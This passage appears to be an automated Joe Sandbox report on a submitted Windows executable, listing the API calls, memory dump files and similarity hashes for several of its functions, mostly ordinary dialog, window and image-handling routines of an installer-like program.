                                                                                                        • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                                        • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                                        • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                                        • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                        • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                        • API String ID: 1731037045-2281146334
                                                                                                        • Opcode ID: 656a9ef2309d032f4de682c1b2e9bfccbe9871d95fe953ac1201f86e79704a8f
                                                                                                        • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                                        • Opcode Fuzzy Hash: 656a9ef2309d032f4de682c1b2e9bfccbe9871d95fe953ac1201f86e79704a8f
                                                                                                        • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                                        APIs
                                                                                                        • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                        • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                        • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                        • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                                        • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3462224810-0
                                                                                                        • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                        • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                                        • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                        • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                                        APIs
                                                                                                        • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                                        • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                                        • GetMenu.USER32(?), ref: 00401E44
                                                                                                          • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                          • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                          • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                          • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                          • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                          • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                                          • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                          • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                          • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                          • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                          • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                          • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                          • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                          • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                          • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                          • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                          • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                          • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                          • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                          • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                                        • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                                        • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                        • String ID: IMAGES$STATIC
                                                                                                        • API String ID: 4202116410-1168396491
                                                                                                        • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                        • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                                        • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                        • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                        • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                                        • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                                        • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                                        • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                                        • SetFocus.USER32(00000000), ref: 0040821D
                                                                                                        • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                                        • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                                        • IsWindow.USER32(00000000), ref: 00408297
                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                                        • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                                        • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                                        • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                                          • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                                          • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                          • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                          • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                          • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                                          • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                          • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                          • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                          • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                          • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                          • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                          • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 855516470-0
                                                                                                        • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                        • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                                        • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                        • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                                        • strncmp.MSVCRT ref: 004031F1
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                                        • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$lstrcmpstrncmp
                                                                                                        • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                                        • API String ID: 2881732429-172299233
                                                                                                        • Opcode ID: 471e04daab831b53a00006510db52a631ba4417ec6ca7480a599de0d51fc2d77
                                                                                                        • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                                        • Opcode Fuzzy Hash: 471e04daab831b53a00006510db52a631ba4417ec6ca7480a599de0d51fc2d77
                                                                                                        • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                                        • GetParent.USER32(?), ref: 00406B43
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                                        • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                                        • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                                        • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                                          • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                                          • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                                          • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 747815384-0
                                                                                                        • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                        • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                                        • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                        • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                        • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                        • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                        • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                        • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                                        • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                                        • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                                        • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                                          • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                          • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                          • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                          • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889686859-0
                                                                                                        • Opcode ID: db9dc12c40266ba28352090c91f8535442cf433b61bc57d004062dfa9524bb35
                                                                                                        • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                                                        • Opcode Fuzzy Hash: db9dc12c40266ba28352090c91f8535442cf433b61bc57d004062dfa9524bb35
                                                                                                        • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 00406F45
                                                                                                        • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                                                        • GetWindowDC.USER32(?), ref: 00406FAA
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                                                        • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 2586545124-0
                                                                                                        • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                        • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                                                        • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                                                        • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                                                        • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                                                        • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                                                        • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                                                        • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                                                        • SetFocus.USER32(00000000,?,000004B4,75570E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMessageSend$Focus
                                                                                                        • String ID:
                                                                                                        • API String ID: 3946207451-0
                                                                                                        • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                        • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                                        • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                        • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
